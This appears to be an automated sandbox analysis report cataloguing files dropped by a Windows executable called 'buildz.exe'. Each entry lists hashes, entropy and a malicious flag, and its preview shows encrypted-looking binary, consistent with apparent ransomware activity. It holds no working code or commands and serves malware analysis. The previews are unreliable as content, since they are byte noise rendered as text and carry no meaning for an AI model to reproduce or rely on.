                        Preview:<?xml..2J..4... L.../.TEn.'.dU..p.....K.P$.....I.c.{....9........fi.>,;..R..-...5.6..c"..b....Oa~..[.+O.b.O......I.C....}e.iEC....e>.-.*4.i.....%'.....H..Z.).d'.....k..li:g$...i*._C......}..M..8.RF.}..A.....II.<=..(&...6kB.....n..~...zt?T9.+a......xz.g..*.]S.G.[l..0..4,...o..K:......j...............>._.A@...lM.+.Weu.<4.....K.Z;..`.!........`r.D.......=W......_.6....../..'.TI.I...G.N`-.f.B........P..r.^^..vA. ......N._..M......._..+....0.YA......$.6..7.....Mc..A..4a.@...I.+.r.......m...3.-..?..."/-{U.M7.O.......b..u.r.7..5k' ...Iz7.o..o.T..<..0.V.........R..C<.{9V..4=..^..t.r...9....<.....]$..J.q.]..r....W.I%XAc.dEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3616
                        Entropy (8bit):7.949519844529248
                        Encrypted:false
                        SSDEEP:96:0/Pm5i5xhJnAjd2VWkLimHN5Mshq6AhJajaECSVgvD/f9WlZYd7A:0/FhJAjk9Lnt5MsUZVRSVgD9W3uA
                        MD5:D8EEA8BC8118EA315FC30BD1CD4746F9
                        SHA1:EA2943FB0A71AAA0453D1173094BF2EA948C231E
                        SHA-256:6E4EDB18BAC27D566D0A3830377581DC7F7ED90C80F25978EF13EC799C6EFD4E
                        SHA-512:29603A16FB92BDC555BFAF93671E6BA5FD7B69EF6043591EBF9EE9FC600AD450A0EF6283A854ABF3AFCA247140C753D3389BCD1C2F6890471DDAC706A9D4FDE0
                        Malicious:false
                        Preview:<?xml...._..F).j...L...8..l!..6.l.U>.dqV.....7...c.U.O....lO%2?....l.[..).<~..z...........#..+[.....*.o./....8"o.O^.t\H.UJ.x...'....f;...w..2.EPW....,....%...\;...&#Lq.l4.j.:.].[%.8..m..BQ.v3..N.g..]@..MV..pPf..e.&d..dq...g.s..-..V...o..3Y...C..Z1.........q4.s....m#....Ll...BC..U).D$be..r.1..j...p.^....:......p3....kK.+..3...~.bo-.<.7?rT.CP..E7....-W..@.z...s......m...7`...T.\z.Z.J1$.........QO<s...[~.@Np.0..;.....E.p.i..jw..W.L]..G.=.7e\....$...0.%.;..NH..\8...f..Mkq...n...E\.....4..q.O...D..e..1..P.r.....G..S..3....ro..!.w..J.{.....%.K3...Z.p..nC...T...7I..}.{.<H...........b..l:....t.?.G...p.....@,^.........1..G%..J.aP.%.C.y.4k...c..2.?(u......5Z`..8S..=.."..3...Y..n....4L.h.....:R........"et5b.D........D.pS=..(..D...|..........Q..:.h2C.}...?I..Y.f.w.P8.X3..u&~......J..B......!.e..3.6M...c'.\...%....qg..xKB.L...5cK_......OE..W..]d.+LJ.....#4h......KL...R.rq...p.~..u..}|2A....M....9.g.m..t..:.Jz..q..<.s..V...R{..|....1.k.+a.{..,.e#..d.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):783
                        Entropy (8bit):7.7154826811930475
                        Encrypted:false
                        SSDEEP:24:cyjlINPX81idm3rqvAndxJMGO+FTJ6WrOGbD:dONvWfcALJlFF6WqUD
                        MD5:91D25FDFF7BC601EDC7F59886FBBDDF4
                        SHA1:E7D244DE06F20BA6629FDD214D809A04CB8C743A
                        SHA-256:05B6635D7C8C3D348F364836CC68296200CCE46CB728675D1116B9E487684125
                        SHA-512:B5FEFDB65B9C456F82BA8371B3435B0075A601A6197B5E9B51733AB8D756903EB44ACFA18002F883135CA0200649A16E65FDB4DC7F0F4A199335672D1520D41D
                        Malicious:false
                        Preview:<?xml).8.1PW.. M./....N.}|>.2...F.ak.......{.....\..>........X@.4..[9D.......%Z.g.*....wc..:..d.A.....|u..>...J....X.&.^J*..U.(..}..v+).6..$Mn...v".h.. ...\;.9.LRBc.O.e....\.oc~...G..m...>.W.....^.._..G.. S....AK..W+..x..II..v....+...T......5}........V..N.fx.g...]..]I..n..f..Y.c..j.f..Xq....!...@..\.~0.w....+&.M..).@.u(...NU.......e...4.BOCh.$..*....2.|.0<N.....='u"..B.>.z......_...)..qe1.&....itkk.O....a.*.~..1.O.T...lX...)..M.K..'._.W......dQ..w.....0Nw3..D.'...#S..dr..+'...<.y.......A.U...]>{....L%..(.....t..C....%..\.......A.....\.[...B.IX.m.i..U..\M..........dKs....u.1FQ.d..h...}).{...>..p..<J.:sI..F...CP..-,_DH...@i.4....Cq.o.4S..MgcC.....A..r...m..)...."f9KEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2331
                        Entropy (8bit):7.9154925531530855
                        Encrypted:false
                        SSDEEP:48:0/8d2RNbqFaW+ZpbN+Ikvm+JfuGa3r62UZkeLNUD:I8d2R4FaW+3wIkvVC/rqNA
                        MD5:1555A569E1D9F01D5EC35D7914CB72D9
                        SHA1:2752534D279751898F65CDFA8898CC3056EAAE30
                        SHA-256:F85D76BCCD13C10748BE8DF81B7DAAAC8CA3B51B378D40EAAF3FC4AC5B8FCADC
                        SHA-512:93DAF585BCCEFAC2056F4E3225E838547898C756F5348CD2896102F9FC81BC111980153E49509E22A68C624E15211A8AB7B83F0C8A3EFB6CD821B56D28F21AA3
                        Malicious:false
                        Preview:<?xml0v.....J.7.^........)..o..Y...v\.o...h....=:.8%0>C.......Kq}..g..EY.....iG..g.'..J.6.!...|...K.y.....j......h.8.N..}...c...n.`....w.|.P_.c..ncn.a.hDW.'.6i..n~....e...&!.....FX.%...J.d..h....*h..s{..a.K8).p>._!<.F.NE..'-c.....I...n.:..Y.nZ......F..!.ys.4JT.c@..Z].7.hh....m..ne.C.......5.!-..?.....e....N={eZ;.=...mN4E.|..z..""Y.)g ...i.....f...4D..j...!X..<..Z.I..Nf..@p.....<[...lX..0FK.'O..t...b.q.Oc....W....1f.\...C..`.3...1USw.R...b-.....E+.M.....s..f.a.b.........m\.7.........!....vA@..Mu..K..F..?.y..h.?......<y.I..+...DE...tb..#...U..Y......5....BM...9.H0....}7....l ....:.............mBu.5...Q^....3..-M0..H...n./...;....<..f.a..)..@|...ZW.t.z.I.....`s.....C,....../_o...X._./...........Ep..lR|f[.J....c..(..f.Pr#..|...8..KY..(_.....1.%rhn..G.S....pc.V5V.....fN!'&..~.t0...g....@x.Aq_.0.]h..z.<.......RQ..Y&+.....t.>...&....o. 2.>..yUS...6)....t.Ql:.m.....mx...k7.q<+M...;.F.....U.....=..j..|.5.T}0s...GH.Z....j..k.[v....Um.F.v:......T.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):44492
                        Entropy (8bit):7.995597315246134
                        Encrypted:true
                        SSDEEP:768:Sxpueu8YScg4IyFXC3W7htpnm8Jq8KddFD0wktsonMO0rzqJc/5lXA:SxpABZg3a79uvuwkt7nJYzqJyzXA
                        MD5:FF9749174E3183197B8D98DEC83B2F3C
                        SHA1:27F2CB54E9910B4625C1D2CB3A25893A4CBA51D2
                        SHA-256:69A698CE895E55D681D4140DD829AB8B23440F1616E935E4D4B7FA9563E4948E
                        SHA-512:C6DD4D279B25016A951BC9BDA50B05B918D1137BF9F4124771CD6DD892342FA79C0B8F5C671A790DCEC13C618EBDDA7DCA13B332257E3DE103DCFF00BAF9D6A8
                        Malicious:true
                        Preview:<?xml..cV...r.NpB:..) ....).f+C...y...........R.p..z..N.()....D.T.x"...ZP...5.(%.....d..hZ..^...k.C.x.@....-.$m....,....PB..&..$..U.M...v....o.O....7`...."0/.ZsR.PU.^.k..k..h.......".M.....nM....[...J.Yv^...Pf..E.Vy^.W~..........;.Gw!....m.g7......N..#I.....\I...z........3..Fd..>.Ys...Tt.:.`(0t.@..a.l....7rr~^..p..L...i.Mw..^.s....sa/..6nO..N.8.......cn ...!. ....Kn..g...6u<......$1A..._f.n..zw..i.r.(.;=..iw.._.k.\.&...3....2.f.Ybk(.[IUA.9{...9.]C....54.jI4.c&.2F.._.h..S\P.Y.2He6...!..R...)....@.5.......&..L.....9.%;Pr.U..Q7R..........Zrj0.o.....B....gD.1-?..l.Tr}./..#cQ.,B.u...qi...q.I<~..Xq4m...9...w......N.7...i.....K...Fe....H.K....G.....)6....)%.^._.#.9e.e.T.?.....1..a.!X$d.h..A.......eo.gu.*A.>mJ.b.h1..WUW...wc.5.1r....5.%.~........v~...wP..ovP.N...?..;l..P.y'=T.v.f.$.8.9..t.t.~..X0Z.QM...ru ..Z...~....EQ.".>`..1r]x.s.aM.M&.%.[..|..L0.r....}:.Q?w.k1i.}J.a.V..Aor..^...n....]..m..P....VD@...X3...:.j.M..S.'......uM...-J.2Y..;..y%y..1..;
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2338
                        Entropy (8bit):7.929807086542517
                        Encrypted:false
                        SSDEEP:48:dEnJYhKq+jhwF2wNudLjnHwCOhBjimrDbA+RpCVq54nOUD:dIWV+Nk2QCXHwfj1rfJv9A
                        MD5:334F44925D0364CBF69B78C9B8365459
                        SHA1:CE4262432E80D8D9A10EF23BCECBF9B42227E73A
                        SHA-256:FD68CF507B9E856F748A6C334A71FC3286830E3A92CD9ABD54FF8ACE6268B7E3
                        SHA-512:8FDB17D57684C2A349E8AEF9597B4D980A24C99C9E7309573AD9D145E3F48DC1F873235032B7DE0BED1A09FCFB6C1572A787CA03121D9D3998EE9DAC1229A89F
                        Malicious:false
                        Preview:<?xml.....`.!=....z.....E..oQ.H.Y.2#...5...6L.|.<......J.0..Z=..k.kV.U..z#..b..pY..q..].~..4..!H.2.....B..e.#.R.7....K.gs..d...`T7g.gw}...G.1.G.i8....\...@@.h./....e.-k......HW.S.....o.jV.c.tj.%..W..=.HA."7.Y.;....,.e.C.X.e...{.....?......f....U.S.*...$.u..M..0.)8%}.`.....D0.2...L.<i..........*...^L7."..B..r..s(....H....*.N.+Y.%.....;..#...GP.4..,...s$.e..U.b....../}NSq....=0.....!.~..y8.d...........Q..-2.X.......c.9Y./.j..._....Ke..Fv...P.[.&c].-O.gJ.4Z]-t....x..o.(..r....%jt;....... H..l]@x. c1.3.0.w..Bf.a8...S..oF*N(..3V.O..`..y....Yy.....<K..$....S./..d."...=.y...B.A..\w.....f.U.G..{..E]....L.*.B.U.U1..D..9...2.....6.di.K.@.FLr...x.G...=.u...u....,j........]..n.(.......tFq......fH\.#2.'~.$BD...v.A.&....~.>..S.V.I..W.0...6.%.....fK.b..y....X..'C5...i..WHy........sR.4k(..h..d.%j.Y.<E8.a...?./.g.wl.......NJR....1.Y..\..HE. ..........^. .]..#_.....UGw..aJ..M..t.|;.M{...eB....S`#..V.` }*D..{.........U..w=..c....>...L.N.po..76QY....B.....zo
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2320
                        Entropy (8bit):7.915853334221447
                        Encrypted:false
                        SSDEEP:48:75D6PhwjJDFSVwOM5GjNRRUT2Vi+grSW9LZG3AimflbRl24uDUD:7NMWVFiw156NRRO6JNGRQnDA
                        MD5:59E8D99F85336906834BECDEC20C076F
                        SHA1:C7E16AA9A89DB3EAB2FA5BE681668E9CE3E5EEB0
                        SHA-256:6786632E408A9755ACB823D53217D40A31F0D1CAEE81E744938008769E442003
                        SHA-512:A51180B1D2394779452D0707BBE58E6B5A724564E61F75BDB1509F3538DDEF46B5127C9F5188D6FC3B77A1866D6EE82450E4295880BD7B2377E6041E24A5A041
                        Malicious:false
                        Preview:<?xml.o.*..+o.9h..L.g.{..$S]....gC.......c.9k<a.d..x.....^.TB.S...yJ....Jpe{E!..(p....M.G....{....e.}..E.X.._-......O{c.....eQ.!....m.Xw.....|..... .......s.y. /......{S\Y......;..x{F:...(A&..wb,..d.+.....M..F.6...?..[...c.yT=7@~.`.|..M.v.3..9.w6\[..I....q....ST..&.U.(.g...b..a.D..,GI....F.....E.e".<7Eu.T..u1...^..m.....O>.C=v..4-Zv{.>.I........wg+)9..w .k.*....D....(.?4E....PH..!_....(s....X.D...&...KEcCV.a..i...b..'..?S. Sq...d..."...J`.~~?<....j.3..&]....%J.B.$^......5..}...m..@..cx.../.A.....e.h.MP. `.h.x.B]....WZ...s.....3...N.%...t! .......L...MW.pl2T..#..b.K...q..!...Z.3.#..j..!..{f..>.....7.;%..9......6(.K.......J.."...Y...3..1...+<...s.!.5......|....$...[......oq.>:3+...P..._..<4..b.F...)tt..4w..j.....I..XQ....y..Py._.l......ze]uI..".........LWt..?C.&P..k.h.k...K..{...nF.z.l.k.x...;..@l.E.n...S..x.c....&.P..^b.O.u.k...D/dh..yc.}...e...OM.d.....o..530.V|.h.n.q.NEK...@...../..i ...$.dF...O.n.^...$\.$..D..W.b(.@....["]
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):41208
                        Entropy (8bit):7.996013598648429
                        Encrypted:true
                        SSDEEP:768:plwNuwgUs38fQqgOz5EmbdZxlnsD9XQ+X8hgO/ECkZ3mgxtA:pK8U8MQpS5EmbDf0X5Q/Enx/A
                        MD5:C1E7A26CD0689CDE8227CBD21A9E9CD1
                        SHA1:B2751F4BC83DFB64F4FC1F68B62543020E408AF0
                        SHA-256:943436C9190F5CEC008F1469BCDF7FFD1428C5C4181481D69499912CE0DBE96E
                        SHA-512:E0B16CF0B7779D77F50B661B77E5A01DCDDD829D593E3729CBF7D292055738701501BB60842756140EA4CF89B3B7FF1BF65EA42016CCDB428ED3135BD0CEA1DD
                        Malicious:true
                        Preview:<?xml....D.t.&....6".g..Z.\..........F....A...).........j.._V&...[.f.oO.X.....w....*....y..CW..............q;/.A...@]..r.....rN..bq_w.A5/.l......N?Z..{#.O.....tc..).xS0_......d...5..2..HiJ.P(...PT....'.9......P.K:#.. .B.S..*.t.s&..m...9Tv.^..*.5..+....d.?.R.{y>/...).W..r...@.C..>..ETl....T....dcY...)...>.*...AN..$......V&..Mp.......N].DW..)Z..a.......{.L;.REA....FD..9...c5.....u.q$. ......$.......)nnUE..]...h...;Km$.Z.%..~{.(....gd|..L............_v......Z.....A...)J...f...Yn...O...L..~..:...D5....0.n..C........Q3Uj......KK..=.i...F.ftN..Y.{`].'..|.p(Yv._sQ.Z.|k8.....7...f..[>y.R.95.7..*..F$...g....Wb...6.......?......9$...:B...T]..~a.H.0L......+......,.V..f.......4.:..m.?(~.l....7Tb8..}.....6.)s.evk..j..s..R...l.......B%(........Gs@...m......{.6!...Q...KG...8Z.x..$.3.>2....^...g..y.h.4...#.....W'wKf.I_rd].....I.Q.....K. .....r.T..[I.|..".<M...q..#.........n3Q........b.m.....RGL.>..uYR..F..'W..h...T...Qy......Z%.......[...pb..g...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):785
                        Entropy (8bit):7.676679819193316
                        Encrypted:false
                        SSDEEP:24:sloP7oYtO2w9oWt5uLVbsO1l+1Yx9GdbO93UHGbD:odn9HXdO1w1ModQ3UHUD
                        MD5:6F4B1EBA675185042308DF213B1860E5
                        SHA1:841F20A802B99E6D4F4139EA46C59D32EC78E4E8
                        SHA-256:5CCA6068D918833BD13816FB3824C43F5B1819E09B75B99177C49546001124C7
                        SHA-512:82D209D595A5665C622C8C96ADD20531C32107A46FE1FBCE5DA0994E274F892ACF38B1DE39A09E4EB21A09AD08A7DC337A4FB7A5903C1BC21CA0780EF72FF250
                        Malicious:false
                        Preview:<?xml........26.}G.g."..Ec.?.T.*_#!..9..Vz.s..[=v..H.....X,.Z...R?&3.U~.3B6.M....ce.......... ..!.z.ST.S.0.4....f..*.......n..f..sT.....q..z.|.gr3G..U...:e...,..q(p.p.h!UzF....B..a.......Ae[.OA....R..R+.B..C/.....bV.Z.:....n..$U....{...l*.E%.r.m........a5.O..^.qM.^.RX$..K.D......!.;.h...Z..O.ItF.8.hIDo..d.@...=7...3.V...........b.....4..O.....U.<.F?.a..E...G}.E.q9e.......bjn....!?t....,..^....C..B.S....!@.e..-..n....^....\.X....$.....D..=..1..W./..+pcXY. r.&.DdL.(y....BvT/.. ....._!t.=.w._..C8..@V%....{.-.a...!0...}.F....r..k.....1O....1...,j.MDY}+\z7x#...sPV..#o.+5 .X...l%{....kz.)n..n.+.I.O.XW......-.w.Tla.%&....'.Y..?..\...W..T.....46"...|lj.#..8WRz+..p2...Mp..c.`k.zEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.72696737486672
                        Encrypted:false
                        SSDEEP:12:WZQKXYHtO/WupaKO+AtdQfMnGuL8hBdJgM3LK4i+b/o3/dwLjyOz/26Gcii9a:8QhHt8WuVALQ85+LK4H8/YvHGbD
                        MD5:08CE18D41AB25F58778708DC965DE697
                        SHA1:04462F16C9CCCFA6B65F1622BC1D8EE8DFC1AFAA
                        SHA-256:5F78365EBF54D176331DB7ABA57662412AB00D541631BEFFBCC19BF7A0EE5AC7
                        SHA-512:C4B5E133B8AA68069D65F2123C338654590A1423B0719541E1D490A31F471B9E186A574C034842F1E13F4965250FAD0F4974208D2B8F9D78021585E39FCF88EE
                        Malicious:false
                        Preview:<?xml..k..SC...d..+.(..X..N....H.5Br.#u...r,3...mq...b.v?....S2.c.-..EY.:..+........m....wi.s._|q.._.1....Bx......0.!.q...LF..>&..xLH.......B.+8.~|[..xF....L....V.D.bUq.j...o.Q.a#..:.y..z.*:]e*i9^..p..1.....l~...._.H'.4Cy.+.l..^u.I...u.........)E......&...`..&\...<U...pB^......X..8.t..FC.?x......+J&v.v.P.u../.[....I.......y..X.........rk...$.....k.......TR.......)..6..DU......U....j..J..@a.W...J.'w'....V.L`.#.,...w_.[.*N....O3.Y.<U2...4........y.../.........K..H4.......p..Tb...wm..CTf...?.].o!.E..7..V....#.E..]u?9.....o;kF...f...q.].KT7..|.TcG..Z.9...}\t\Q0..V..W.[5}....k...@..L|)...^P.Y.....I....h..r........@.U...`...l.E.k.O=.nEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1428
                        Entropy (8bit):7.853199073671151
                        Encrypted:false
                        SSDEEP:24:t4NsBFzWZ+QzWu+MZVQR0M0Gm0Rfq0djakoHSAaok/VS1k2QHWyjmFyGbD:ONsBFqkQzWexImqfra9HSVok0S/9juyA
                        MD5:77497DA7F66F62C6CBD6BC1437F45440
                        SHA1:59CF804524F31E60A31BBB951995ADEB761DB194
                        SHA-256:255C633693FD9A4842CB9A681B384EE5CC405332141EF494BA47FD3A7DB5F16A
                        SHA-512:9C1097B9A1D5229AE78B9FE4D35AFA0BBCFD82EEE66235E0DD377CE20C9C65D3077A3CCD5F1716B40CC0B002F6152FC116175CFE46F8096A108445C344F74C26
                        Malicious:false
                        Preview:<?xml#N....s...X?5b.~...f{......B..Z.>.G-.-.a.).t...`.O.Zj..*...)+....#..L<......r.)..M.z<..^.g.z.^1+]Qw.k...IX......>....-kcX..*8.gR."....^....sIL.j!RH|O...x..E'.6..=.\_.j.......^.!?K...d..~%....\...<.....<9.)....C.yq...O..f..Di...<Oa./4.*....".O.p.z....>.#..s.'2l...........1..Bp.k..L...,.B...>.@Z. 5...w..,....E..._...tA.U....w...i8.g;P....I...m....L~IwtX...lv?yC'.<...%.U +2...w.E.v...E5AO..{ Jisjh.......2.>.Y..T..Ae=...*...f.^..<.......!...[J.W...S..u....e.I..5..X..j..N`....g..`...."..............]2.....^E.{}......Be.....E.....!`...../...fJ....ak&.... ..,.. .).Y...+.5[..%....V...$.U/!F..1.>k}.....7.#.AOy.Z<..\$vK..G.ZZ.1..pl...a.4...(.....&..7.J.mR.p.....`0....y....]9...q,.f..[i..k..7.......=.Z.....o.|.Ud..+.NGWf.>...l....}7r...c..)+..=l..z6 .Oy1V!{%?.....#...-1.60.....Y..Zr/.=..23D.NNlZ.V..H...A..B.QM.4y...Q..........w..nF.C..x=.9][y.r.C.u.k?<..4{...}.&..{.+...,...O....]8Xw.."d..6.9L).'.v.'...].P.t.b.]..j.L..$....l.|.....B.;..1F.!..._.".
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):978
                        Entropy (8bit):7.762968294551268
                        Encrypted:false
                        SSDEEP:24:/JHDfGy6LMW6S7IjviFx650l/IQyTwKombieL8GHGbD:/9DeyfSj6RQQwK3208IUD
                        MD5:1CAE1144C133C80B5F1EAEC8A482A4AD
                        SHA1:BD969BEF717A248206CCD45D1B964A4BF3D0C148
                        SHA-256:B7DE0565A31EB77E406011E1C22C330EBBEDAF79B020E8036A393835D5CCAA5F
                        SHA-512:BE486F66710186D04EA1A58588B094EA27EBD927775E230BAA8D206A9173B687A8998A05970A804B805E4EAD551D61E7F22E7FA08C9335F85F1778E219684F6B
                        Malicious:false
                        Preview:<?xmlLH.aL..4.P....r$..t?G3..j......D..%..|A..QT./..8..0...?rt.L.r+..hJ.Q,...4^G....{.Q...t0.:.Jd.Nx.{2.i..+...j.s..}...C....5=.. .9..g.......k..L.x.f.a....1...m..P.lH..'..Y.+$..^..F..5..!."Q.P.Iy.F.q..^.b.>.p...Tx..B.....|..@...uiu.\._g.&Z,{...y...V^6.ds....K.T..}..@>%....3...:.....}cL.osE....xx.......... .k....Y..A.A.Q#.$.....v.o.......".J.L...~....F..K..WP..B1...A.t....D'..a.s..l+b.7.... I.....5.r.7....k....2d.M...Yp.<.i...@.3.....L...{..k\KF.D.+n.c.~..u...sQ..:....xCARY....1....Y0Pl....}....6.]&...]on.x..i.X......Y..v...5.j.&3.U....R fR.l..2..[l.z.7.....Q.....'...".+...-. ...M..C*.......i..K...`.P=....,.i.S.l..K-.....~.+.]....#....i.Y1[y...2......gK.3..yC..<.'...55r'.....f!ub%...V...R.h.2...yE...r..I.....J~7. .;.!M.....2U<5...).{.NXm....P.=.Bx........H1Rq....`..):~.-S.@..o.&EH../g.m.n[.....<....4:...w..1..........4.TH..,..}...&..Y.H.{p.4>EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1008
                        Entropy (8bit):7.773511947017975
                        Encrypted:false
                        SSDEEP:24:XqjQOvItgAzOvm8MJ+hbSUuX+PMAGqJiO9mUZHGbD:XqEP8Mr+PVJJ59fZHUD
                        MD5:C98D0F647A02870D473C19B1FEC19B5B
                        SHA1:D7737EC39D810C7C635F5C92EB76C1D46CD6E6A5
                        SHA-256:80F7F651104BF1ADBB89A2C04B109C4BC34D6F821CBDDE33FB3C34663C34CBF8
                        SHA-512:C7BC5B8EDC0EEBDCF4EF93AE872B6046F1E1732415CE6F0F92DFF676F2F52A49A8EEC30660F6D505A9FCED43B1B11BB3EFB1F9845EBABA26F40F941170F5CDE3
                        Malicious:false
                        Preview:<?xmli..F...3r..Y.G.N..@.V.?.j.C......s...M...<p........0y.....r...P.Y...../....6.....6G.j.}...p.05.....v........|O..Y...P..,.[..y.?;.P...~_Y.D.Sb{ I........S.og%..........Q(=..<I......`........_?.>q..WB.#.I.....w.j.....y68...x..{...........5N.n..k.9....X7#y~.!...%.H...g.k....U.@..m.*.D.;...G.MC.`.8...y~...Iq...l...,O.F... t...{.?(SP.{.Z.4a...yp.Zip...[8....cF....B....m...^...D.....d......r..{.......A....A.B..qXq"?J].......[x.$..I-Hs?....."}..X*.w.A..v1...c.h36B....1...Y..Tz.F.Z.)6..Y...7.BZ.~M..y. ...t...-}..a..b.Hp!.5....VV!V...^..*...}o...x*.......R>./j17.).....}.. _q..?.%"5..(.....-.M..X.a..V...L*..e#...b...{3.l.\..K.p..<..8.s.PW....d.[........a.'.....up\.%..\.O..5.Bv..dn.V29B.0.5..Un.!q.....7........Cr..3.......).t.]k..OY.(.o..@.x+..2...L.U~..T..k.R..P...T.....?m...i..|..!.5.gl.]\....E~..".eU..^.c.|?v.E.63........K..>..|.x%].3...g..p..{...7y.7T@..Q].<w=]........x....A..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1028
                        Entropy (8bit):7.760534923902913
                        Encrypted:false
                        SSDEEP:24:w81e6OYeiT/s2Bh2jRxa1ccUNyJNQmbTrGbD:wgOYew/sbRxHc9J/rUD
                        MD5:C44C8937647CD6D96552FF04DCE29FA9
                        SHA1:C542035815B4F6E6B284094FCB6D0A98E1B3AE7A
                        SHA-256:EC377123C5A9F420FF0E7CAF4AC9048B546FADF885F83C3C62166765CA49FFCE
                        SHA-512:4A5BA01CF96910ADF6236EA4FB3308B825D848D5603E26995A61D012500E668C9EDF486776BB847C8019D12D1DCB3E3F96C667F8707E3C121E6C0A806FC45E70
                        Malicious:false
                        Preview:<?xml.|..~.x.....[.'e..H]Xi.Bk...8:..H............e..g..$...........1..B^.6m."<!..~.)......p.[~*..o.....n.0W...:c.S.....J'.....e..B.$./..92yO..h.K..B6.c7...r-0..#i.w...:..1C.%..F.{..0.%...C..7....d!"j'.42=.>..a5_..6}.!..mr.t.".2.}...'J=.0g../j...(\...`'?._.y4.d.Kqf.+.._.4M.+...;.......Dg..sn_.(.i...~..oQ=p|......S.....@..~...DMl.}D.......q..'z....P..d0....0...V...."....{DV.h...N..nQ......-.B,..=..=]D....h6.......>.S.W.vP.R..9.)`C,..xt.j..'EV..\...z..j1....Y. N#.......3...E...v#1.0x....(..R.}.u.f....Y..".L......f..J......}......T....-^...)....'.d.........v{7aX.53>...rXl.sk..K.Zj.....I.*..U._...G^,3.%.}jU....=.$..~...z.!.~.)..".(#...f.68..l.t!.R0k.....PV.....M.L.#....H."..]./x....1....JF.. ._.....|..!d.yU.\....&..G.,../.....g|...{..j....}E..<.4.....R.C`..=...\N..,.PW.......u:.."..laiZ.;E..8Cm.....t.~C.^8.s.....>7.A.M..p..4.\...Y...IoSQ.p;..Y..0l>vg..^.s..XLB..WYV_..uR3.....X._...KY..._F^.t...F.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1453
                        Entropy (8bit):7.831886370215612
                        Encrypted:false
                        SSDEEP:24:Nz5wtfj7yWUUtIPoSiIxvKvOndASvcbuTP2iuBRDNJ9mKnTVGbD:NzifKPwIhRGSvcboPsZzTnTVUD
                        MD5:3B858F6FA16604630898F1411D085BE8
                        SHA1:02E7AAEE0B7E12DE0A5EA9FFB2D8365F2E79D88B
                        SHA-256:175EA4D73A3C67B080BEA84717D866245A0D159AF83ED5CAF5E99BAA0712FBB1
                        SHA-512:29FB4B89C70DC7903866DA3FDADBD5EE9588192ABF88146ADDB8BBF9DB0EC29DE7A20480909BE379714925434371910DB2C9AA8DE2CDEDCEB7538BE63859E86F
                        Malicious:false
                        Preview:<?xml..-...k.lg}m....X3^.ob...R..ai..E@......n.0..V.....x.........!...5?....;........8zz..1.mD>..`....#.b..X\....2>.h.C.....9.>...4R..4.......1UcA....G..w.ku..".P...W..$9...m/..d......5.n....v.."f..l..}.&d5.g...JL.......?.X..= .&..%.j.p....:.2...Gz9..I..E..b..b...(.i.=v/.f.e..0.X..!..7YP....I..f.....F5...A.7Ua....=`.....\y .....I7.X..\q.o.k...`q.H.pPf..3...OK'.-AR...sU..% .;#.c......S.bEW;..73.s.U.z.`....(.....D.K..h......R.s..|....\;c.....X'...l.....\!.j.X....#....C..T........y.Y.o.&...\n.$0..'..L...Om.q....K.../..X.wG...'.T..[8.P..hj...k..@B../f.n.. b...%.|.& ...YU.JA.la......y..4..5.8/8..?.t.\T27E.4..9....?3t}....s<.wOT.7..\.........Y..@....n.9..O.\..;&..\........2j.M}...)7R`y..A..i4&..&<nj.z.!...j.iB.o.?.-v..."......Z2.%.;.....).v....bi.(..&..WD9m.H.....$....&R......d.E.........7..BM...'@.6..5/.J=..F..98...Q..D.]6J3..t..\jO.....h3l.i....{.u.S..H..(.?p...wR..L ..+.`mC....eRE...j...}..}.i........7hq.h....3.........2Y...M.....:..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1388
                        Entropy (8bit):7.861951153073358
                        Encrypted:false
                        SSDEEP:24:djxInpkbDERbRXUPN/VPSXaVbeQgVminfRELBtl4i0p4ykS6BWBiag1BjDTGbD:Anpk+kPyJQhinWLBtui0p4yt6BDUD
                        MD5:9F7CF5CDC5E6437EAAC61E9D7119AA85
                        SHA1:F516F19C319C7C114F3058517FDD2CD6460D3E8C
                        SHA-256:EDCEE1C9A662794D6DCDB5C646C9DA6BFA3B5F4B6129EE9D368F4D68A19705A0
                        SHA-512:A327F579C2936F8B2A8836E03BFD72B83B345A061A62B7305F47DB9759C9DEC42365D94104643D37E5D5E7BB89A62F314A4E5C7CFB903D6E6E52081DE80D798A
                        Malicious:false
